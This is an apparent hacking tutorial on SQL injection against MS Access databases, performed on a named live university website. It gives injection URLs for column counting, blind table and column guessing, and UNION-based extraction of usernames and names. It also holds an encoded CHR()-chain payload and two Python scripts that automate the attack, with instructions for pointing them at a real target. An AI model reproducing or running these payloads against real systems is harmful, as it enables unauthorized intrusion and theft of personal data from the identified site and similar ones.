Here I will show you how to perform SQL injection against an MS Access database :)
As we know, MS Access has no information_schema, so we have to brute force almost everything :p
same as MySQL <= 4 :)
For better understanding, I am going to perform the injection on a live site *_*
Here we go,
SITE: http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12
Let's check whether it's a false positive or not. The two conditions below must give different responses:
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=1 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1>1 (error *_*)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 1=2 (error)
The error looks something like the image below :)
The parameter is used as an integer (no quote is needed to break out of the query), so let's start the injection now ;)
Let's find the number of columns with a simple ORDER BY statement,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 1 ( no error )
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 2 (no error)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 3 (no error)
.
.
.
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 order by 7 (Error)
ORDER BY 6 works and ORDER BY 7 errors, so the number of columns is 6 :)
We can't use a UNION SELECT unless we know at least one table name, because Jet does not accept a SELECT without a FROM clause.
Let's find a table name first. As I already mentioned, MS Access has no information_schema, so we have to guess table names. Here is your query :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [hii]) and 1=1
Here is your result, as "hii" is not a valid table name :) If the table does not exist, Jet fails on the subquery and the page errors; if it exists, count(*) is never negative, so the condition is true and the page loads normally.
Now replace "hii" with some common table names.
I highly recommend you use some automated tool or script for this, because it's a somewhat annoying process :/ and time consuming too. I had written a Python script for this; I will publish it soon ;)
For now let's do it manually:
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [admin]) and 1=1
...................... (ERROR)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [tbl_user]) and 1=1 ............................ (ERROR)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count(*) from [users]) and 1=1 .......... (BINGO!!!!!! NO ERROR) *_*
So this indicates that the table "users" exists in the database :)
We can follow the same procedure to find columns. Here is our query :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([hii]) from [users]) and 1=1
Now replace "hii" with different column names and repeat the whole procedure again. Hope you understand :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 and 0<=(select count([id]) from [users]) and 1=1
............. (NO ERROR)
After spending a lot of time on column names, I found "id, name, email" as columns of the table "users".
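The whole guessing procedure above (ORDER BY to count columns, then table names, then column names) is the same yes/no question asked over and over: does the page still render after this payload? The script below, added here as an example and not the author's own script, automates it. The base URL is the tutorial's; the candidate word lists, the Jet error marker, and the FakeJetBackend class (a constructed stand-in so the block runs offline) are assumptions.

```python
# Added example (not the author's script): automates the three inference
# steps of the tutorial against a Jet/MS Access backend. Candidate lists,
# the error marker and FakeJetBackend are assumptions for an offline run.
import re
import urllib.error
import urllib.parse
import urllib.request

BASE = "http://www.cityuniversity.edu.pk/cusitnew/news.php?id="  # from the tutorial
GOOD_ID = 12  # an id that renders normally

def order_by_payload(n):
    return f" order by {n}"

def table_probe(table):
    # count(*) is never negative, so the condition is true whenever the
    # table exists; a missing table makes Jet fail and the page errors.
    return f" and 0<=(select count(*) from [{table}]) and 1=1"

def column_probe(table, column):
    return f" and 0<=(select count([{column}]) from [{table}]) and 1=1"

def build_url(base, value, payload):
    # Percent-encode the whole parameter value (spaces become %20).
    return base + urllib.parse.quote(f"{value}{payload}", safe="")

def find_column_count(oracle, max_cols=30):
    # ORDER BY n fails as soon as n exceeds the number of selected columns.
    for n in range(1, max_cols + 1):
        if not oracle(order_by_payload(n)):
            return n - 1
    return None

def find_tables(oracle, candidates):
    return [t for t in candidates if oracle(table_probe(t))]

def find_columns(oracle, table, candidates):
    return [c for c in candidates if oracle(column_probe(table, c))]

def http_oracle(base, value, error_marker="Microsoft JET Database Engine"):
    # Live oracle: True when the page renders, False on a Jet error.
    # error_marker is an assumption; copy it from the real error page.
    def oracle(payload):
        try:
            with urllib.request.urlopen(build_url(base, value, payload), timeout=10) as r:
                return error_marker not in r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError:
            return False  # some stacks answer a failed query with HTTP 500
    return oracle

class FakeJetBackend:
    """Constructed stand-in for the target's database (offline demo only).
    It answers the way the tutorial's screenshots do: no error while
    ORDER BY is in range, no error for a table/column that exists."""
    PROBE = re.compile(r" and 0<=\(select count\((\*|\[(\w+)\])\) from \[(\w+)\]\) and 1=1$")

    def __init__(self, ncols, schema):
        self.ncols = ncols
        self.schema = schema  # {table: set(columns)}

    def __call__(self, payload):
        m = re.match(r" order by (\d+)$", payload)
        if m:
            return int(m.group(1)) <= self.ncols
        m = self.PROBE.match(payload)
        if not m:
            return False  # anything else is a syntax error in Jet
        column, table = m.group(2), m.group(3)
        if table not in self.schema:
            return False
        return column is None or column in self.schema[table]

if __name__ == "__main__":
    # Constructed schema that reproduces the tutorial's findings.
    db = FakeJetBackend(6, {"users": {"id", "name", "email", "username"}})
    print(find_column_count(db))
    print(find_tables(db, ["admin", "tbl_user", "users", "members"]))
    print(find_columns(db, "users", ["hii", "id", "name", "email", "username", "pass"]))
    print(build_url(BASE, GOOD_ID, table_probe("users")))
```

To run it against a real target, swap `db` for `http_oracle(BASE, GOOD_ID)` and pass your own word lists; the oracle only needs to tell "page rendered" from "Jet error", so if the site hides error text, compare the response length against the known-good page instead of searching for a marker.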
NOW LET'S DO IT UNION BASED,
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,2,3,4,5,6 from users
............................ (HERE WE MUST MENTION THE TABLE NAME, since Jet rejects a SELECT without FROM)
Here we see that column 2 is the one the page echoes.
Let's extract some data from the table "users", whose columns are "id, name, email, username" ;)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=12 union select 1,username,3,4,5,6 from users
Once I posted this as a challenge on "Web InJ3ct0rs-SQL, XSS, LDAP, XPATH ,XML ,R/LFI Injections".
I got different solutions from others; I'm going to share one of them with you.
Thanks to Janus Slovan for his solution :)
http://www.cityuniversity.edu.pk/cusitnew/news.php?id=-2%20UnIoN%20aLL%20SeLeCt%201,%20%20left(date(),10)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20CHR(106)%20%2b%20CHR(97)%20%2b%20CHR(110)%20%2b%20CHR(117)%20%2b%20CHR(115)%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20username%20%2b%20%20CHR(32)%20%2b%20CHR(58)%20%2b%20CHR(58)%20%2b%20CHR(32)%20%2b%20name,3,4,5,6%20from%20users
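Decoded, the solution above sets id=-2 so the original query returns no row and only the UNION row is displayed, then packs several values into the echoed column 2: `left(date(),10)` as a tag, the literal "janus", `username` and `name`, all joined with " :: ". Every literal is spelled as `CHR(n) + CHR(n) + ...`, which is why the request contains no quote character at all, and every `+` is sent as `%2b`, because a bare `+` in a query string decodes to a space. The block below, added here as an example and not Janus Slovan's or the author's code, builds and decodes such payloads; the base URL is the tutorial's, while the field names and the -2 id are assumptions taken from that solution.

```python
# Added example (not the author's or Janus Slovan's code): build and decode
# union-based extraction payloads whose string literals are CHR() chains.
import re
import urllib.parse

BASE = "http://www.cityuniversity.edu.pk/cusitnew/news.php?id="  # from the tutorial

def chr_concat(text):
    # "::" -> "CHR(58) + CHR(58)"; in Jet SQL, + concatenates strings.
    return " + ".join(f"CHR({ord(c)})" for c in text)

def decode_chr(fragment):
    # Reverse the trick, e.g. to read what a captured payload spelled out.
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", fragment))

def union_payload(ncols, table, echoed_col, expr):
    # Numbers fill the slots the page never shows; expr goes into the one
    # column the page echoes (column 2 in the tutorial).
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[echoed_col - 1] = expr
    return f" union select {','.join(cols)} from {table}"

def extraction_url(base, ncols, table, echoed_col, fields, sep=" :: ", no_row_id=-2):
    # no_row_id (assumed -2, as in the quoted solution) matches no real row,
    # so the only row rendered is the UNION row. quote() turns + into %2B.
    expr = f" + {chr_concat(sep)} + ".join(fields)
    value = f"{no_row_id}{union_payload(ncols, table, echoed_col, expr)}"
    return base + urllib.parse.quote(value, safe="")

if __name__ == "__main__":
    print(extraction_url(BASE, 6, "users", 2, ["username", "name"]))
    print(decode_chr("CHR(106) + CHR(97) + CHR(110) + CHR(117) + CHR(115)"))
```

One caveat when concatenating real columns this way: in Jet, `+` with a Null operand yields Null, so a row whose `name` is empty disappears from the output entirely. Using `&` instead (sent as `%26`) treats Null as an empty string and keeps the row.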
Thanks for reading, I hope you liked it. Please do share, and feel free to ask anything about the tutorial. :)
Give some suggestions to improve this tutorial :)
Thank you all ..............